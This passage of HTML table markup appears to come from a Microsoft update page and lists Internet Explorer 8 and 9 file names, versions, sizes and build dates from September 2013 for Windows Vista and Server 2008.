class=\"sbody-tr\"><td class=\"sbody-td\">Iedkcs32.dll</td><td class=\"sbody-td\">18.0.6001.23532</td><td class=\"sbody-td\">387,584</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">09:10</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iepeers.dll</td><td class=\"sbody-td\">8.0.6001.19475</td><td class=\"sbody-td\">184,320</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">12:51</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iepeers.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">184,320</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">09:10</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Licmgr10.dll</td><td class=\"sbody-td\">8.0.6001.19475</td><td class=\"sbody-td\">43,520</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">12:51</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Licmgr10.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">43,520</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">09:11</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iedvtool.dll</td><td class=\"sbody-td\">8.0.6001.19475</td><td class=\"sbody-td\">743,424</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">12:50</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iedvtool.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">743,424</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">09:10</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeeds.dll</td><td class=\"sbody-td\">8.0.6001.19475</td><td class=\"sbody-td\">630,272</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">12:52</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeeds.mof</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">1,876</td><td class=\"sbody-td\">15-Apr-2010</td><td class=\"sbody-td\">01:25</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeeds.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">630,272</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">09:11</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeeds.mof</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">1,876</td><td class=\"sbody-td\">19-Apr-2010</td><td class=\"sbody-td\">23:16</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeedsbs.dll</td><td class=\"sbody-td\">8.0.6001.19475</td><td class=\"sbody-td\">55,296</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">12:52</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeedsbs.mof</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">1,938</td><td class=\"sbody-td\">15-Apr-2010</td><td class=\"sbody-td\">01:25</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeedssync.exe</td><td class=\"sbody-td\">8.0.6001.19475</td><td class=\"sbody-td\">13,312</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">09:27</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeedsbs.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">55,296</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">09:11</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeedsbs.mof</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">1,938</td><td class=\"sbody-td\">19-Apr-2010</td><td class=\"sbody-td\">23:16</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeedssync.exe</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">13,312</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">05:34</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Html.iec</td><td class=\"sbody-td\">2018.0.0.19475</td><td class=\"sbody-td\">385,024</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">11:14</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Html.iec</td><td class=\"sbody-td\">2018.0.0.23532</td><td class=\"sbody-td\">385,024</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">07:29</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtmled.dll</td><td class=\"sbody-td\">8.0.6001.19475</td><td class=\"sbody-td\">67,072</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">12:52</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtmled.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">67,072</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">09:12</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtml.dll</td><td class=\"sbody-td\">8.0.6001.19475</td><td class=\"sbody-td\">6,017,024</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">12:52</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtml.tlb</td><td class=\"sbody-td\">8.0.6001.19475</td><td class=\"sbody-td\">1,638,912</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">09:27</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtml.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">6,017,536</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">09:12</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtml.tlb</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">1,638,912</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">05:34</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieproxy.dll</td><td class=\"sbody-td\">8.0.6001.19475</td><td class=\"sbody-td\">247,808</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">12:51</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieproxy.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">247,808</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">09:10</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieshims.dll</td><td class=\"sbody-td\">8.0.6001.19475</td><td class=\"sbody-td\">198,144</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">12:51</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieshims.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">198,144</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">09:10</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jsdbgui.dll</td><td class=\"sbody-td\">8.0.6001.19475</td><td class=\"sbody-td\">522,240</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">12:51</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jsdbgui.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">522,240</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">09:11</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iertutil.dll</td><td class=\"sbody-td\">8.0.6001.19475</td><td class=\"sbody-td\">2,005,504</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">12:51</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Sqmapi.dll</td><td class=\"sbody-td\">6.0.6001.19475</td><td class=\"sbody-td\">129,536</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">12:57</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iertutil.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">2,006,016</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">09:10</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Sqmapi.dll</td><td class=\"sbody-td\">6.0.6001.23532</td><td class=\"sbody-td\">129,536</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">09:16</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ie4uinit.exe</td><td class=\"sbody-td\">8.0.6001.19475</td><td class=\"sbody-td\">174,080</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">09:29</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iernonce.dll</td><td class=\"sbody-td\">8.0.6001.19475</td><td class=\"sbody-td\">55,808</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">12:51</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iesetup.dll</td><td class=\"sbody-td\">8.0.6001.19475</td><td class=\"sbody-td\">71,680</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">12:51</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ie4uinit.exe</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">174,592</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">05:36</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iernonce.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">55,808</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">09:10</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iesetup.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">71,680</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">09:10</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iesysprep.dll</td><td class=\"sbody-td\">8.0.6001.19475</td><td class=\"sbody-td\">109,056</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">12:51</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iesysprep.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">109,056</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">09:10</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Vgx.dll</td><td class=\"sbody-td\">8.0.6001.19475</td><td class=\"sbody-td\">759,296</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">12:57</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Vgx.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">759,296</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">09:16</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Url.dll</td><td class=\"sbody-td\">8.0.6001.19475</td><td class=\"sbody-td\">105,984</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">12:57</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Url.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">105,984</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">09:16</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieframe.dll</td><td class=\"sbody-td\">8.0.6001.19475</td><td class=\"sbody-td\">11,111,936</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">12:51</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieui.dll</td><td class=\"sbody-td\">8.0.6001.19475</td><td class=\"sbody-td\">164,352</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">12:51</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieframe.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">11,113,472</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">09:10</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieui.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">164,352</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">09:10</td><td class=\"sbody-td\">x86</td></tr></table></div><h3 class=\"sbody-h3\">Internet Explorer 9</h3><h4 class=\"sbody-h4\">Internet Explorer 9 on all supported 32-bit versions of Windows Vista and Windows Server 2008</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">File version</th><th class=\"sbody-th\">File size</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Platform</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Urlmon.dll</td><td class=\"sbody-td\">9.0.8112.16514</td><td class=\"sbody-td\">1,104,896</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">10:13</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Urlmon.dll</td><td class=\"sbody-td\">9.0.8112.20625</td><td class=\"sbody-td\">1,104,896</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">11:27</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iexplore.exe</td><td class=\"sbody-td\">9.0.8112.16514</td><td class=\"sbody-td\">757,400</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">10:59</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iexplore.exe</td><td class=\"sbody-td\">9.0.8112.20625</td><td class=\"sbody-td\">757,400</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">12:14</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Inetcpl.cpl</td><td class=\"sbody-td\">9.0.8112.16514</td><td class=\"sbody-td\">1,427,968</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">10:14</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Inetcpl.cpl</td><td class=\"sbody-td\">9.0.8112.20625</td><td class=\"sbody-td\">1,427,968</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">11:28</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jsproxy.dll</td><td class=\"sbody-td\">9.0.8112.16514</td><td class=\"sbody-td\">65,024</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">10:09</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wininet.dll</td><td class=\"sbody-td\">9.0.8112.16514</td><td class=\"sbody-td\">1,129,472</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">10:13</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wininetplugin.dll</td><td class=\"sbody-td\">1.0.0.1</td><td class=\"sbody-td\">66,048</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">10:10</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jsproxy.dll</td><td class=\"sbody-td\">9.0.8112.20625</td><td class=\"sbody-td\">75,264</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">11:24</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wininet.dll</td><td class=\"sbody-td\">9.0.8112.20625</td><td class=\"sbody-td\">1,130,496</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">11:27</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wininetplugin.dll</td><td class=\"sbody-td\">1.0.0.1</td><td class=\"sbody-td\">66,048</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">11:24</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iedvtool.dll</td><td class=\"sbody-td\">9.0.8112.16514</td><td class=\"sbody-td\">678,912</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">10:16</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iedvtool.dll</td><td class=\"sbody-td\">9.0.8112.20625</td><td class=\"sbody-td\">678,912</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">11:31</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeeds.dll</td><td class=\"sbody-td\">9.0.8112.16514</td><td class=\"sbody-td\">607,744</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">10:05</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeeds.mof</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">1,518</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">08:55</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeeds.dll</td><td class=\"sbody-td\">9.0.8112.20625</td><td class=\"sbody-td\">607,744</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">11:20</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeeds.mof</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">1,518</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">10:03</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtmled.dll</td><td class=\"sbody-td\">9.0.8112.16514</td><td class=\"sbody-td\">73,216</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">10:03</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtmled.dll</td><td class=\"sbody-td\">9.0.8112.20625</td><td class=\"sbody-td\">73,216</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">11:18</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtml.dll</td><td class=\"sbody-td\">9.0.8112.16514</td><td class=\"sbody-td\">12,336,128</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">10:29</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtml.tlb</td><td class=\"sbody-td\">9.0.8112.16514</td><td class=\"sbody-td\">2,382,848</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">10:03</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtml.dll</td><td class=\"sbody-td\">9.0.8112.20625</td><td class=\"sbody-td\">12,336,640</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">11:57</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtml.tlb</td><td class=\"sbody-td\">9.0.8112.20625</td><td class=\"sbody-td\">2,382,848</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">11:18</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieproxy.dll</td><td class=\"sbody-td\">9.0.8112.16514</td><td class=\"sbody-td\">194,560</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">10:10</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieproxy.dll</td><td class=\"sbody-td\">9.0.8112.20625</td><td class=\"sbody-td\">194,560</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">11:24</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieshims.dll</td><td class=\"sbody-td\">9.0.8112.16514</td><td class=\"sbody-td\">194,560</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">10:10</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieshims.dll</td><td class=\"sbody-td\">9.0.8112.20625</td><td class=\"sbody-td\">194,560</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">11:24</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieunatt.exe</td><td class=\"sbody-td\">9.0.8112.16514</td><td class=\"sbody-td\">142,848</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">10:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows feed discovered.wav</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">19,884</td><td class=\"sbody-td\">05-Mar-2011</td><td class=\"sbody-td\">05:23</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows information bar.wav</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">23,308</td><td class=\"sbody-td\">05-Mar-2011</td><td class=\"sbody-td\">05:23</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows navigation start.wav</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">11,340</td><td class=\"sbody-td\">05-Mar-2011</td><td class=\"sbody-td\">05:23</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows pop-up blocked.wav</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">85,548</td><td class=\"sbody-td\">05-Mar-2011</td><td class=\"sbody-td\">05:23</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieunatt.exe</td><td class=\"sbody-td\">9.0.8112.20625</td><td class=\"sbody-td\">142,848</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">11:22</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows feed discovered.wav</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">19,884</td><td class=\"sbody-td\">05-Mar-2011</td><td class=\"sbody-td\">11:01</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows information bar.wav</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">23,308</td><td class=\"sbody-td\">05-Mar-2011</td><td class=\"sbody-td\">11:01</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows navigation start.wav</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">11,340</td><td class=\"sbody-td\">05-Mar-2011</td><td class=\"sbody-td\">11:01</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows pop-up blocked.wav</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">85,548</td><td class=\"sbody-td\">05-Mar-2011</td><td class=\"sbody-td\">11:01</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jsdbgui.dll</td><td class=\"sbody-td\">9.0.8112.16514</td><td class=\"sbody-td\">387,584</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">10:16</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jsdbgui.dll</td><td class=\"sbody-td\">9.0.8112.20625</td><td class=\"sbody-td\">387,584</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">11:30</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iertutil.dll</td><td class=\"sbody-td\">9.0.8112.16514</td><td class=\"sbody-td\">1,796,096</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">10:03</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Sqmapi.dll</td><td class=\"sbody-td\">6.0.6000.16386</td><td class=\"sbody-td\">149,656</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">10:59</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iertutil.dll</td><td class=\"sbody-td\">9.0.8112.20625</td><td class=\"sbody-td\">1,796,096</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">11:19</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Sqmapi.dll</td><td class=\"sbody-td\">6.0.6000.16386</td><td class=\"sbody-td\">149,656</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">12:14</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Vgx.dll</td><td class=\"sbody-td\">9.0.8112.16514</td><td class=\"sbody-td\">768,512</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">10:10</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Vgx.dll</td><td class=\"sbody-td\">9.0.8112.20625</td><td class=\"sbody-td\">768,512</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">11:24</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Url.dll</td><td class=\"sbody-td\">9.0.8112.16514</td><td class=\"sbody-td\">231,936</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">10:12</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Url.dll</td><td class=\"sbody-td\">9.0.8112.20625</td><td class=\"sbody-td\">231,936</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">11:26</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieframe.dll</td><td class=\"sbody-td\">9.0.8112.16514</td><td class=\"sbody-td\">9,739,264</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">10:22</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieui.dll</td><td class=\"sbody-td\">9.0.8112.16514</td><td class=\"sbody-td\">176,640</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">09:59</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieframe.dll</td><td class=\"sbody-td\">9.0.8112.20625</td><td class=\"sbody-td\">9,739,264</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">11:38</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieui.dll</td><td class=\"sbody-td\">9.0.8112.20625</td><td class=\"sbody-td\">176,640</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">11:14</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jsdebuggeride.dll</td><td class=\"sbody-td\">9.0.8112.16514</td><td class=\"sbody-td\">104,448</td><td class=\"sbody-td\">22-Sep-2013</td><td 